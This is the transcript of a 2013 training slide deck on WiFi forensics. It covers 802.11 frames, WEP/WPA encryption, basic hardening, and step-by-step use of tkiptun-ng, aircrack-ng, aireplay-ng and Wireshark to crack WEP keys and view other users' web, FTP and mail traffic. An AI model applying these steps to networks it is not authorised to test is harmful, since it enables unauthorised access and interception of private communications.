WiFi Networks Forensics Overview

WiFi Networks Forensics Overview
Mike Davis, EE/MSEE , CISSP, SysEngr ISSA/TSN/SOeC/ AFCEA/NDIA/IEEE/INCOSE et al Glenn G Jacobs, BSEE, Security + Creative Commerce LLC

Presentation Overview
Why Wireless Networks ? What is Wireless Internet (Wi-Fi ?) WiFi Implementation WiFi Threat Landscape WiFi Basic Security Measures WiFi Tools WiFi Network Discovery WiFi Packet Sniffing Example WiFi WEP Password Cracking Example Web Links 5/23/2013 Copyright 2013 Creative Commerce LLC

Copyright 2013 Creative Commerce LLC
Why Wireless Networks? CONVENIENCE OF INSTALLATION !! Wireless Access Point (WAP) addition to system routers is straightforward Wireless Security has frequently just been taken for granted CONVENIENCE OF MOBILITY !! Businesses with less than $10 million in annual revenue are leading the charge with 83 percent either using or planning to use Wi-Fi ( 76 percent of workforce be using a mobile networking device by (Laptops/PDAs, etc) ( workforce.html) Connectivity is now as convenient as a local coffee shop 5/23/2013 Copyright 2013 Creative Commerce LLC

What is Wireless Internet (Wi-Fi ?)
Definition: A GHz / 5 Ghz radio-frequency data communication architecture and associated protocols based upon the IEEE x standards. A key concept is that WiFi networks exchange data frames between systems using the MAC (Media Access Control) and Logical Link Control (LLC) sublayers of the OSI Dat a Link Layer using an RF LAN card communicating at the PHYS (Physical) layer: 5/23/2013 Copyright 2013 Creative Commerce LLC

WiFi Implementation Frequency Assignment (2.4GHz shown, 802.11b/g/n)
NOTE the signal be attenuated by at least 30 dB from its peak energy at ±11 MHz from the centre frequency, the sense in which channels are effectively 22 MHz wide. One consequence is that stations can only use every fourth or fifth channel without overlap, typically 1, 6 and 11 in the Americas. 5/23/2013 Copyright 2013 Creative Commerce LLC

WiFi Implementation Channel s 1-7 Frequency Assignment (2.4GHz, g) 1. Above frequencies are all permitted in US. Not all WiFi frequencies are legal in all nations. 5/23/2013 Copyright 2013 Creative Commerce LLC

WiFi Implementation 802.11 “G” Standard
Up to 54 MB/s data transfer rates Transfer rate drops to 1 MB/s at 300 feet Orthogonal frequency-division multiplexing (OFDM) or Direct Sequence Spread Spectrum (DSSS) Typical range of 300 feet - a hacker’s dream Most “g” hardware backward compatible with “a” and “b” systems WiFi “G” was the most popular WLAN for new installations until 2009 5/23/2013 Copyright 2013 Creative Commerce LLC

WiFi Implementation 802.11 “N” Standard (2009)
Multi-stream 2.5 GHz/5GHz architecture Up to 150 MB/s single-stream Up to 300 MB/s dual stream Up to 450MB/s three-stream Up to 20 MHz channel width Multiple-input / Multiple Output (MIMO) multi- streaming protocol 5/23/2013 Copyright 2013 Creative Commerce LLC

WiFi Implementation 802.11 “ac” 5G Standard (2013)
Multi-stream 5GHz architecture Supplements and incorporates older “N” equipment Up to 450 MB/s single-stream Up to 900 MB/s dual stream Up to 1.3GB/s three-stream Up to 80 MHz channel width Multiple-input / Multiple Output (MIMO) multi- streaming protocol 5/23/2013 Copyright 2013 Creative Commerce LLC

WiFi Implementation “Infrastructure Mode” Concept
Ethernet Router is cabled to Wireless Access Point (WAP) and radiates WiFi 5/23/2013 Copyright 2013 Creative Commerce LLC

WiFi Implementation Terminology BSS: Basic Service Set – The WiFi network infrastructure concept- a router or Wireless Application Point (WAP) transmitter communicating with workstations BSSID: The Media Access Layer (MAC ) link unique ID for router or Wireless Application Point (WAP) transmitter SSID : Service Set Identifier: The broadcasted WiFi ID which each User must specify to obtain access to a given WiFi network. Functions as a virtural “username”. Management frames : “Frames that broadcast the router’s SSID , show User “probe requests”, association/disassociation activity, andauthentication/deauthentication Copyright 2013 Creative Commerce LLC 5/23/2013

WiFi Implementation 802.11 Frame Standards
Current standards define "frame" types for use in transmission of data as well as management and control of wireless links. Frames are divided into very specific and standardized sections. Each frame has a MAC header, payload and FCS. Some frames may not have payload portion. First 2 bytes of MAC header is a frame control field that provides detailed information about the frame. The sub fields of the frame control field is presented in order. Protocol Version: It is two bits in size and represents the protocol version. Currently used protocol version is zero. Other values are reserved for future use. Type: It is two bits in size and helps to identify the type of WLAN frame. Control, Data and Management are various frame types defined in IEEE Sub Type: It is four bits in size. Type and Sub type are combined together to identify the exact frame. ToDS and FromDS: Each are one bit in size. They indicate whether a data frame is headed for a distributed system. Control and management frames set these values to zero. All the data frames will have one of these bits set. However communication within an IBSS network always set these bits to zero. More Fragment: The More Fragmentation bit is set most notably when higher level packets have been partitioned and will be set for all non-final sections. Some management frames may require partitioning as well. Retry: Sometimes frames require retransmission, and for this there is a Retry bit which is set to one when a frame is resent. This aids in the elimination of duplicate frames. Power Management: The Power Management bit indicates the power management state of the sender after the completion of a frame exchange. Access points are required to manage the connection and will never set the power saver bit. 5/23/2013 Copyright 2013 Creative Commerce LLC

WiFi Implementation 802.11 Frame Standards (cont’d)
More Data: The More Data bit is used to buffer frames received in a distributed system. The access point uses this bit to facilitate stations in power saver mode. It indicates that at least one frame is available and addresses all stations connected. WEP: The WEP bit is modified after processing a frame. It is toggled to one after a frame has been decrypted or if no encryption is set it will have already been one. Order: This bit is only set when the "strict ordering" delivery method is employed. Frames and fragments are not always sent in order as it causes a transmission performance penalty. The next two bytes are reserved for the Duration ID field. This field can take one of three forms: Duration, Contention-Free Period (CFP), and Association ID (AID). An frame can have up to four address fields. Each field can carry a MAC address. Address 1 is the receiver, Address 2 is the transmitter, Address 3 is used for filtering purposes by the receiver. The Sequence Control field is a two-byte section used for identifying message order as well as eliminating duplicate frames. The first 4 bits are used for the fragmentation number and the last 12 bits are the sequence number. An optional two-byte Quality of Service control field which was added with e. The Frame Body field is variable in size, from 0 to 2304 bytes plus any overhead from security encapsulation and contains information from higher layers. The Frame Check Sequence (FCS) is the last four bytes in the standard frame. Often referred to as the Cyclic Redundancy Check (CRC), it allows for integrity check of retrieved frames. As frames are about to be sent the FCS is calculated and appended. When a station receives a frame it can calculate the FCS of the frame and compare it to the one received. If they match, it is assumed that the frame was not distorted during transmission. 5/23/2013 Copyright 2013 Creative Commerce LLC

Management Frames allow for the maintenance of communication. Some common subtypes include: Authentication frame: authentication begins with the Wireless Network Interface Card (WNIC) sending an authentication frame to the access point containing its identity. With an open system authentication the WNIC only sends a single authentication frame and the access point responds with an authentication frame of its own indicating acceptance or rejection. With shared key authentication, after the WNIC sends its initial authentication request it will receive an authentication frame from the access point containing challenge text. The WNIC sends an authentication frame containing the encrypted version of the challenge text to the access point. The access point ensures the text was encrypted with the correct key by decrypting it with its own key. The result of this process determines the WNIC's authentication status. Association request frame: sent from a station it enables the access point to allocate resources and synchronize. The frame carries information about the WNIC including supported data rates and the Service Set Identifier (SSID) of the network the station wishes to associate with. If the request is accepted, the access point reserves memory and establishes an association ID for the WNIC. Association response frame: sent from an access point to a station containing the acceptance or rejection to an association request. If it is an acceptance, the frame will contain information such an association ID and supported data rates. Beacon frame: Sent periodically from an access point to announce its presence and provide the SSID, and other parameters for WNICs within range. Deauthentication frame: Sent from a station wishing to terminate connection from another station. Disassociation frame: Sent from a station wishing to terminate connection. It's an elegant way to allow the access point to relinquish memory allocation and remove the WNIC from the association table. Probe request frame: Sent from a station when it requires information from another station. . 5/23/2013 Copyright 2013 Creative Commerce LLC

Probe response frame: Sent from an access point containing capability information, supported data rates, etc., after receiving a probe request frame. Reassociation request frame: A WNIC sends a reassociation request when it drops from range of the currently associated access point and finds another access point with a stronger signal. The new access point coordinates the forwarding of any information that may still be contained in the buffer of the previous access point. Reassociation response frame: Sent from an access point containing the acceptance or rejection to a WNIC reassociation request frame. The frame includes information required for association such as the association ID and supported data rates. Control frames facilitate in the exchange of data frames between stations. Some common control frames include: Acknowledgement (ACK) frame: After receiving a data frame, the receiving station will send an ACK frame to the sending station if no errors are found. If the sending station doesn't receive an ACK frame within a predetermined period of time, the sending station will resend the frame. Request to Send (RTS) frame: The RTS and CTS frames provide an optional collision reduction scheme for access point with hidden stations. A station sends a RTS frame to as the first step in a two-way handshake required before sending data frames. Clear to Send (CTS) frame: A station responds to an RTS frame with a CTS frame. It provides clearance for the requesting station to send a data frame. The CTS provides collision control management by including a time value for which all other stations are to hold off transmission while the requesting stations transmits. Data frames carry packets from web pages, files, etc. within the body.[ 5/23/2013 Copyright 2013 Creative Commerce LLC

WiFi Implementation : WEP Encryption
Wired Equivalent Privacy Older standard 64-bit WEP uses a 40 bit key, which is concatenated with a CLEAR TEXT 24-bit initialization vector (IV) to form the RC4 traffic key. All of the major manufacturers now implement an extended 128-bit WEP protocol using a 104-bit key size (WEP-104). Highly vulnerable to forensic packages such as aircrack-ng DO NOT USE WEP EXCEPT FOR TRAINING/DEMONSTRATION 5/23/2013 Copyright 2013 Creative Commerce LLC

WiFi Implementation : WPA Encryption
WiFi Protected Access (WPA) Temporal Key Integrity Protocol (TKIP): implements a key mixing function that combines the secret root key with the initialization vector before passing it to the RC4 initialization. WEP, in comparison, merely concatenated the initialization vector to the root key, and passed this value to the RC4 routine. This permitted the vast majority of the RC4 based WEP key attacks. WPA implements a sequence counter (TSC) to protect against “replay “ attacks. Packets received out of order will be rejected by the access point. TKIP implements a 64-bit message integrity check (MIC) named “MICHAEL” Vulnerable to forensic packages such as “tkiptun-ng” 5/23/2013 Copyright 2013 Creative Commerce LLC

WiFi Implementation : WPA Encryption (cont’d)
Tkiptun MIC Retrieval Usage: tkiptun-ng <options> <replay interface> Filter options: -d dmac : MAC address, Destination -s smac : MAC address, Source -m len : minimum packet length -n len : maximum packet length -t tods : frame control, To DS bit -f fromds : frame control, From DS bit -D : disable AP detection Replay options: -x nbpps : number of packets per second -a bssid : set Access Point MAC address -c dmac : set Destination MAC address -h smac : set Source MAC address -F : choose first matching packet -e essid : set target AP SSID 5/23/2013 Copyright 2013 Creative Commerce LLC

Tkiptun MIC Key Retrieval Usage: tkiptun-ng <options> <replay interface> Debug options: -K prga : keystream for continuation -y file : keystream-file for continuation -j : inject FromDS packets -P pmk : pmk for verification/vuln testing -p psk : psk to calculate pmk with essid Source options: -i iface : capture packets from this interface -r file : extract packets from this pcap file --help : Displays this usage screen 5/23/2013 Copyright 2013 Creative Commerce LLC

Tkiptun MIC Key Retrieval Example: Input: tkiptun-ng -h 00:0F:B5:AB:CB:9D -a 00:14:6C:7E:40:80 -m 80 -n 100 rausb0 Output: The interface MAC (00:0E:2E:C5:81:D3) doesn't match the specified MAC ....so Address Resolution Protocol (ARP) is forced… ARP Reply Checking x.y 15:54:11 Reversed MIC Key : C3:95:10:04:8F:8D:6C:66 5/23/2013 Copyright 2013 Creative Commerce LLC

WiFi Implementation : WPA -2 Encryption
WiFi Protected Access -2 CCMP (Counter Mode with Cipher Block Chaining Message Authentication Code Protocol) replaces TKIP 1. Advanced Encryption Standard (AES) is the cipher system 2. Key Management and Message Integrity is handled by a single component built around AES using a 128-bit key, a 128-bit block, and 10 rounds of encoding per the FPS-197 standard. 3. A CCMP Medium Access Control Protocol Data Unit (MPDU) comprises five sections: MAC header, CCMP header Data unit Message integrity code (MIC), Frame check sequence (FCS). Of these, only the data unit and MIC are encrypted. WPA-2 is vulnerable to “breaking handshake” and “brute force dictionary” attacks 5/23/2013 Copyright 2013 Creative Commerce LLC

WiFi Implementation Enterprise-Grade Encryption
Enterprise –grade WPA: Remote Authentication Dial-In User Service (RADIUS) . RADIUS uses a challenge/response method for authentication When a user logs on, the network access server (NAS), wireless access point (WAP) or authentication server creates a "challenge," which is typically a random number sent to the client machine. The client software uses its password or a secret key to encrypt the challenge via an encryption algorithm or a one-way hash function and sends the result back to the network (the "response"). The authentication system also performs the same cryptographic process on the challenge and compares its result to the response from the client. If they match, the authentication system has verified that the user has the correct password. 5/23/2013 Copyright 2013 Creative Commerce LLC

WiFi Threat Landscape HACKER’S GOALS: Penetrate / Elevate / Manipulate
PENETRATION – Hacker accesses system under attack ELEVATION – Hacker increases their system privilege level by utilizing system services MANIPULATION – Hacker directs the victim’s system to do his bidding 5/23/2013 Copyright 2013 Creative Commerce LLC

WiFi Threat Landscape DHCP contains large amounts of known plaintext Rogue Wireless Application Points Hostile Wandering Clients AdHoc (Peer-to-Peer) “Free Public WiFi” hostile networks Denial Of Service Attacks 57 percent of IT managers are not confident that their organization knows the state of every endpoint that connects to their network. More than 50 percent of companies are using shared passwords or no encryption at all on Wi-Fi access points. Only 29 percent of companies check to make sure computers up to date and patched before allowing traveling or remote employees to access the network when they return to the office. More than 50 percent of companies surveyed have guests accessing the network every day, with 20 percent allowing non-employees to plug directly into the network without security check or controls. 31 percent of companies do not know the identity of every user on their network. - 5/23/2013 Copyright 2013 Creative Commerce LLC

WiFi Threat Landscape WiFi Intrusion at TJ Max – Vulnerability to Hostile Client WiFi Network with inadequate WEP encryption replaced retail outlet cabling at kiosks in MN 5/23/2013 Copyright 2013 Creative Commerce LLC

WiFi Basic Security Measures Change Admin Password Settings
Change Wireless Router/Wireless Access Point (WAP) Username / Password from Industry Defaults: Username: admin Password: admin 5/23/2013 Copyright 2013 Creative Commerce LLC

WiFi Basic Security Measures Change Encryption Settings
DO NOT USE Wired Equivalent Privacy (WEP) Encryption – its encryption keys can be broken in less than 1 minute. Use stronger encryption such as WPA-PSK (WiFi Protected Access-Pre-Shared Key). This wireless encryption method uses a pre-shared key (PSK) for key management. Keys can usually be entered as manual hex values, as hexadecimal characters, or as a Passphrase. 5/23/2013 Copyright 2013 Creative Commerce LLC

Wifi Tools SUMMARY Handheld Directional RF WiFi Detector with spare CR2032 Lithium “hearing-aid” batteries Windows OS or Linux or Mac OS Laptop with spare fully charged battery packs Wireless LAN WiFi PC “Interface” Adapter (Card/USB) that supports “Monitor Mode” – super critical ! WiFi Forensics Software for network discovery, packet capture, and analysis 120V Electrical Power – Automotive Adapter Paper Forms and Logs 5/23/2013 Copyright 2013 Creative Commerce LLC

Wifi Tools Handheld Directional RF Detector Hawking Technology Model HWL b/g WiFi Locator Network Specification : IEEE b/g Operating Frequency: 2.4~ Ghz Operating Range : Up to 1000 feet (Line of Sight), Up to 300 feet (Indoors) LEDs 1 x Power, 5 x Signal Strength Antenna Gain: dBi Battery : 1 x Lithium CR2032, 2 Year Battery Life Dimensions 92 (L) x 56 (W) x 25 (H) mm Weight 45g tlist.php?CatID=32&FamID=71&ProdID=131 Hawking Technology Model HWL1 Functionality Point the Directional Antenna towards the source and press the Locate" button. The signal filters on the Model HWL1 filter through all unwanted 2.4GHz signals, such as BlueTooth, cordless phones and microwaves 5/23/2013 Copyright 2013 Creative Commerce LLC

Wifi Tools - Windows OS vs. Linux vs Mac OS Laptop Selection Criteria User comfort and familiarity level will affect the OS choice. Microsoft Windows OS, with its restricted Win32 kernel, has fewer WiFi forensics hardware/software ensembles. Windows has fewer “monitor mode” wireless LAN card/ password-cracking software combinations than Linux. There have been recent additions. Linux has a large number of historically prominent WiFi forensics packages. The majority of these software packages are still “command-line” and may require time for familiarization. Recently, “windows-like” Linux WiFi forensics software has become available, often as a part of free forensics distributions such as “Backtrack 4”. MacOS is supported by the popular multifunctional KisMAC WiFi “stumbler” (network discovery) / packet sniffing / password cracking software. KisMAC is geared toward network security professionals. The “Apple Airport” WiFi network card is supported by Linux. 5/23/2013 Copyright 2013 Creative Commerce LLC

Wifi Tools Wireless LAN WiFi PC Adapter (Card/USB) that supports “Monitor Mode” “Ordinary” laptop WiFi access (coffee shop Web surfing , , etc) involves the WiFi PC adapter running in so-called “managed mode”. This is the default mode for all purchased laptops. In managed mode, the User’s laptop wireless adapter and its software depend entirely on the infrastructure’s wireless router to provide network connectivity. Usernames and passwords are seldom required for coffee shops and other public places. Managed mode is useless for WiFi packet sniffing forensic activities. Some Windows OS software “stumbler” (WiFi network discovery/enumeration) programs can function (partially) with WiFi adapters operating in managed mode. One of these is “Wireless Mon” by PassMark. Forensic laptop WiFi network card must be placed in “Monitor” Mode Popular Laptop WiFi cards such as Broadcom often do not support “Monitor” Mode. Chipsets by Hermes, Prism2, Spectrum24, Raylink, Zydas, and Atheros are supported by most forensics software. 5/23/2013 Copyright 2013 Creative Commerce LLC

Wifi Tools Linux WiFi Card Setup Forensic laptop WiFi network card must be placed in “Monitor Mode”. To accomplish this, as the Linux root User do the following on the Linux command line: iwconfig <enter> Note the Mode: Managed (vs Mode: Monitor) command line response To REQUEST change to Monitor mode : iwconfig eth01 mode monitor <enter> (Note: “eth01” is a typical network card interface designator. Your PC’s may instead be “ath01” , for example, if your WiFi interface card chipset is from Atheos). 5/23/2013 Copyright 2013 Creative Commerce LLC

Wifi Tools Linux WiFi Card Setup (cont’d) 4. To ACTIVATE change to Monitor mode : ifconfig eth01 up <enter> 5. To CONFIRM activation of Monitor mode : ifconfig eth01 <enter> The command line will display the term UP BOADCAST MULTICAST, indicating Monitor mode . If your WiFi interface card chipset is from Atheos use the following below commands instead: 4. “Destroy” Manager Mode wlanconfig atho1 destroy <enter> 5. REQUEST change to Monitor mode : wlanconfig atho1 create wlandev wifi0 wlanmode monitor <enter> 6. ACTIVATE change to Monitor mode : ifconfig ath01 up <enter> 7. To CONFIRM activation of Monitor mode : ifconfig ath01 <enter> The command line will display the term UP BOADCAST MULTICAST, indicating Monitor mode. Copyright 2013 Creative Commerce LLC 5/23/2013

Wifi Tools Software Concepts Network Discovery and Enumeration Most Packet Capture software also performs Network Discovery and Enumeration “Wireless Mon” (Windows OS) – runs in Managed Mode Kismet (Linux – contained on BackTrack 4 distributions) Packet Capture using capture software “engines” WinPcap (Windows OS) LibPcap (Linux library) Packet “Sniffing” (retrieval/display), Analysis, Reporting Wireshark (Windows OS and Linux) Tcpdump (Linux) . Oldest and most popular network sniffer. WinDump (Windows OS’s Win 95 through Win XP) 5/23/2013 Copyright 2013 Creative Commerce LLC

Wifi Tools Packet Capturing Software
Digital Packet Capturing (PCAP) provides data stream input for WiFi “sniffer”/analysis software WiFi radio signal is received by hardware “interface” card (WNIC) and transferred to PCAP PCAP software is often bundled with distribution of sniffer/analysis software Windows users – “WinPcap” software Linux users –”LibPcap” software 5/23/2013 Copyright 2013 Creative Commerce LLC

WiFi Network Discovery “Wireless Mon” WiFi “Managed Mode” Network “Drive-By” Discovery Software “Wireless Mon” WiFi Discovery Software by Passmark. Runs in WiFi “Managed Mode” (!) – a rarity. This means almost any Windows OS “Wireless Laptop” off the shelf can utilize, at least partially, the functionality of “Wireless Mon”: Detects and monitors wireless (WiFi) networks within range. Provides Service Set Identifier (SSID), system availability, and encryption information Presents live channel usage chart to help identify forensics targets Generates signal strength coverage maps (Professional Edition) by either manually plotting points or using a GPS device 5/23/2013 Copyright 2013 Creative Commerce LLC

WiFi Network Discovery Windows OS “Wireless Mon” WiFi “Managed Mode” Discovery Example Use Summary Tab to observe nearby WiFi “Channel Use” Channel Use Chart displays number of local WiFi routers for the selected Channel upon mouseover, as well as their status (green for “Available”, blue for “Connected”, red for “Not Available”) Majority of small WiFI installations use Channel 6 5/23/2013 Copyright 2013 Creative Commerce LLC

WiFi Network Discovery Windows OS “Wireless Mon” WiFi “Managed Mode” Network Discovery Example (cont’d) In example below, Wireless Mon Summary Tab shows : “ SSID” (Service Set ID) – the WiFi User logon “username” “MAC Address” (Machine Access Code Address) - (MAC address is six bytes (48 bits) long, where the first three bytes (Organizational Unique Identifier,“OUI”) represent the manufacturer ) FCC WiFi Channel Assignment WiFi “Security” ( Encryption) Mode (“None”, WEP (weakest encryption), WPA2, or WPA-PSK) NOTE THAT A LARGE PERCENTAGE OF DEPLOYED SMALL SYSTEMS HAVE ROUTERS BROADCASTING MANUFACTUER’S NAME (ie, “linksys”, “2WIRE351”) 5/23/2013 Copyright 2013 Creative Commerce LLC

WiFi Network Discovery Windows OS “Wireless Mon” WiFi “Managed Mode” Network Discovery Example (cont’d) Use Summary Tab to further observe list of nearby WiFi networks In example below, Summary Tab shows that all below WiFi networks : Deploy “Infrastructure” (Wireless Router broadcasts to all nearby receivers) Support 54 Mb/s rates Use Orthogonal Frequency Division Multiplexing (ODFM 24) Wireless Mon can store WiFi Discovery results for input to forensic reports Copyright 2013 Creative Commerce LLC 5/23/2013

WiFi Network Discovery Wireless LAN WiFi PC Adapter (Monitor Mode) – Windows OS CACE (Creative Advanced Communication Engineering) “AirPcap TX” Monitor Mode USB Wireless Adapter Contains WiFi Antenna Utilizes WinPcap 4.01 (beta) packet capture software Provides packet injection required to support WiFi password cracking software such as AirCrack Shipped with popular Wireshark sniffer software Supports Windows Vista OS CACE Model “AirCap TX” Copyright 2013 Creative Commerce LLC 5/23/2013

WiFi Packet Sniffing Example Wireshark “Associate” (connect) with WiFi network Select sniffer “Interface” (WiFi Monitor Mode network card). Then click on “Options”. 5/23/2013 Copyright 2013 Creative Commerce LLC

WiFi Packet Sniffing Example Wireshark (cont’d) 5. Click Stop in the WireShark Capture menu . 6. Browse through WireShark’s frame list and observe the forensic target WiFi User ‘s “Web Surfing” (HTTP) frames. 7. Type the expression “http” in the WireShark “Display Filter”. Then click the adjacent “Apply” button. 8. WireShark will then display only Web Surfing” (HTTP) frames. Copyright 2013 Creative Commerce LLC 5/23/2013

WiFi Packet Sniffing Example Wireshark (cont’d)
WIRESHARK DISPLAY OF HTTP FRAMES ONLY: 5/23/2013 7/9/2008 For HTCIA/CACI/Gov't Use Only © 2008 CACI Copyright 2013 Creative Commerce LLC 48

WiFi Packet Sniffing Example Wireshark (cont’d) Forensics Examiner may observe IMAGES from captured HTTP “Web Surfing” Frames: Examiner right-clicks on above “JPEG File Interchange Format” line and exports RAW image file (as “Imagexx.jpg”) to a folder RESULT: 5/23/2013 Copyright 2013 Creative Commerce LLC

WiFi Packet Sniffing Example Wireshark (cont’d) WIRESHARK DISPLAY OF HTTP FRAME HISTORICAL “THREADS”: Click on the first HTTP frames of interest – usually GET commands In the WireShark Analyze menu, click on Follow TCP Stream TCP Streams will appear parsed by Web Page activity 5/23/2013 Copyright 2013 Creative Commerce LLC

WiFi Packet Sniffing Example Wireshark (cont’d) FREE IDENTIFICATION OF WEBSITE ORIGINS FROM HTTP frames of interest – usually GET commands Type website IP Address into LIVE PRODUCT DEMO at : EXAMPLE: RESULT: 5/23/2013 Copyright 2013 Creative Commerce LLC

WiFi Packet Sniffing Example Wireshark (cont’d) WIRESHARK DISPLAY OF FTP FRAMES ONLY Type the expression “ftp” in the WireShark “Display Filter”. Then click the adjacent “Apply” button. WireShark will then display only File Transfer Protocol (FTP) frames. 5/23/2013 Copyright 2013 Creative Commerce LLC

WiFi Packet Sniffing Example Wireshark (cont’d) WIRESHARK DISPLAY OF FTP FRAME HISTORICAL “THREADS”: Click on the first FTP frame of interest – usually USERNAME In the WireShark Analyze menu, click on Follow TCP Stream TCP Streams will appear parsed by Web Page activity 5/23/2013 Copyright 2013 Creative Commerce LLC

WiFi Packet Sniffing Example Wireshark (cont’d) WIRESHARK DISPLAY OF GOOGLE MAIL FRAMES ONLY Type the expression “host” followed by the captured Google Mail server name in the WireShark “Display Filter”. Then click the adjacent “Apply” button. WireShark will then display only Google Mail frames. 5/23/2013 Copyright 2013 Creative Commerce LLC

WEP Password Cracking Example Decrypt WEP (Wired Equivalent Privacy) Capture File Windows OS Command Line – partial GUI support Examiner clicks on airodump-ng-airpcap and completes “IV capture” startup screen: 5/23/2013 Copyright 2013 Creative Commerce LLC

WiFi WEP Password Cracking Example Decrypt WEP (Wired Equivalent Privacy) - Begin Creating IV Capture File Airodump will automatically gather the needed IVs (Initialization Vectors) , starting at a slow pace (# Data column) 250,000+ IVs required to break 64-bit WEP Key 1,500,000 + IVs required to break 128-bit WEP key Target WiFi Router MUST BE ACTIVE – Users Web Surfing, etc 5/23/2013 Copyright 2013 Creative Commerce LLC

WiFi WEP Password Cracking Example Decrypt WEP (Wired Equivalent Privacy) Accelerate IV Capture – Packet Injection Examiner uses aireplay-ng command-line utility to constantly inject packets to accelerate IV creation by target (and capture) Target WiFi router performance may be impacted Target Intrusion Detection Systems (IDS) may respond Copyright 2013 Creative Commerce LLC 5/23/2013

WiFi WEP Password Cracking Example Decrypt WEP (Wired Equivalent Privacy) Capture File Windows OS Command Line – partial GUI support Forensic Examiner clicks on aircrack-ng GUI and completes decryption screen 5/23/2013 Copyright 2013 Creative Commerce LLC

WiFi WEP Password Cracking Example Recovered Key Display by Aircrack-ng SUCCESSFUL KEY DECRYPTION Forensic examiner may insert below Decrypted Key (Hex Format, 66756A7839) into WireShark Decryption Keys list. WireShark will automatically decrypt packets and display them. Forensic Examiner may “log on” (associate with) WiFi network (BSS) - bulliron with passkey fujx9 Copyright 2013 Creative Commerce LLC 5/23/2013

Web Links Hawking Handheld Directional WiFi Detector mID=71&ProdID=131 Wireshark Packet Sniffer / Analyzer CACE (Creative Advanced Communication Engineering) “AirPcap TX” Monitor Mode USB Wireless Adapter for Microsoft Windows “AirCrack” Password Cracking Software 5/23/2013 Copyright 2013 Creative Commerce LLC

Web Links (cont’d) Remote-Exploit.org “BackTrack 4” Forensics CD (Linux programs run “independently” in User’s CD drive) PassMark “WirelessMon” Wireless Network Enumeration (“Stumbler”) Utility 5/23/2013 Copyright 2013 Creative Commerce LLC

Web Links (cont’d) WIGLE (Wireless Geographic Logging Engine) - List of Default WiFi “Service Set IDs” (SSIDs) Institute of Electrical and Electronic Engineers (IEEE) Searchable List of MAC Address “OUI” (Organizational Unique Identifier) Manuacturer’s Codes - first 3 bytes of MAC address 5/23/2013 Copyright 2013 Creative Commerce LLC

Web Links (cont’d) Forensic Software Product Line Overview from Clarifying Technologies products/products_public.html RADIUS “Challenge” User Authentication/Password Utility nge%252Fresponse.html 5/23/2013 Copyright 2013 Creative Commerce LLC

References WI-FOO - The Secrets of Wireless Hacking (Andrew Vladimirov et al, Addison-Wesley) Wireshark & Ethereal – Network Protocol Analyzer Toolkit (Angela Orebaugh et al, Syngress) Penetration Tester’s OPEN SOURCE TOOLKIT Volume 2 (Aaron Bayles, et al, Syngress) 5/23/2013 Copyright 2013 Creative Commerce LLC

References COMPUTER EVIDENCE – Collection and Preservation (Christopher L.T. Brown, Charles River Media) HACKER’S CHALLENGE 3 (David Pollino et al, McGraw-Hill) 5/23/2013 Copyright 2013 Creative Commerce LLC

References (cont’d) REAL DIGITAL FORENSICS - Computer Security and Incident Response (Keith Jones, Richard Bejtlich, Curtis Rose) ANTI-HACKING TOOLKIT (Mike Shema et al, McGraw-Hill) 5/23/2013 Copyright 2013 Creative Commerce LLC

Questions ? Mike Davis, EE/MSEE , CISSP, SysEngr
ISSA/TSN/SOeC/ AFCEA/NDIA/IEEE/INCOSE et al Glenn G Jacobs, BSEE, Security + Creative Commerce LLC 71 5/23/2013 Copyright 2013 Creative Commerce LLC

WiFi Networks Forensics Overview

Similar presentations

Presentation on theme: "WiFi Networks Forensics Overview"— Presentation transcript:

Similar presentations

About project

Feedback

Log in

Auth with social network:

WiFi Networks Forensics Overview

Similar presentations

Presentation on theme: "WiFi Networks Forensics Overview"— Presentation transcript:

Similar presentations

About project

Feedback